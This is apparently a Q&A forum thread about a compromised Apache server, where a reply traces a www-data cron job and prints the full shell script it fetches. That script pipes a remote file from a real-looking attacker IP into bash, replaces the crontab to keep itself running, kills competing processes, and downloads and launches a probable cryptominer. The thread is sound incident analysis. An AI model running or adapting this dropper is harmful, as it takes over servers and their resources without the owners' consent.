# server compromised - ./sysd -c apache.cf -t 1 eating all memmory

Tags: apache2, hacking

My server was most certainly compromised. Now I want to find where hackers enter the server. Before attack I can see in syslog:

```
 May 13 01:28:23 eee crontab[10680]: (www-data) DELETE (www-data)
May 13 01:28:23 eee crontab[10681]: (www-data) REPLACE (www-data)
May 13 01:29:01 eee cron[955]: (www-data) RELOAD (crontabs/www-data)
May 13 01:29:01 eee CRON[10697]: (www-data) CMD (curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s)
```

It is able to add cronjob and call some image file. Where do I search for clues? Thank you.

[image]

Answer (score 1, accepted):

Take a closer look at the curl cronjob.

It executes a bash command and the name of the bash script is logo11.jpg.

```
curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s
```

This is just a very cheap trick and not very sophisticated. If you put the command in another order and download the file, the command would look something like this:

**PLEASE DO BE CAREUL, DONT DOWNLOAD THE FILE AND EXECUTE. THIS IS INFORMATIONAL**

```
bash -s logo11.jpg
```

So don't be fooled by the ending .jpg. It ain't a jpg, it's just a plain text file with the follwowing commands.

Onvce it is in your cron, bash will simply execute this "Text"-File which is actually a small bash script. Easy, huh?

```
#!/bin/sh
pkill -f suppoie 
pkill -f vlqd
ps aux | grep -vw apache | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w syslogs |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
curl -o /var/tmp/sysd http://136.144.175.206:4477/2/sysd
curl -o /var/tmp/apache.cf http://136.144.175.206:4477/2/null.cf
chmod 777 /var/tmp/sysd
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sysd -c apache.cf -t `echo $cores` >/dev/null &
fi
sleep 3
echo "running....."
```

FYI - I emailed the ISP to take a look at this, the ip is still alive and the file still downloadable. It's the decent thing to do and that's why I'm writing this. A few lines can help a fellow admin.

Comment: Hi, thank you, yes i can see that. I just dont know how it is able to execute the file

Comment: When crontab reads the entry it executes it. Look, this would be the command (simplyfied).

bash -s logo11.jpg (meaning that it will execute every command you see in my post). There are two more curl lines, which indicate that two files are downloaded. sysd and null.cf

How have they been able to do this I can't tell either. I'd say they managed to inject this into the system through the apache because of bad code or an exploit or bad setup, maybe even a mixture of all.

Comment: Hi, I figured it out - this is a drupal vulnerability discovered recently - https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/ BTW. how did you decode the file? Thank you for help

Comment: I'll show you it's really simple anyways.... oh and I'll update the answer for other to find this more easily

Comment: hi, so please show me how to decode the file. Did you use any kind of online decoder?

Comment: wow just used whois, the records show this ip is registered in amsterdam. I'm gonna write the ISP a note, telling him to forward this email to the admin of this machine. maybe this machine has been taken over as well, you never know.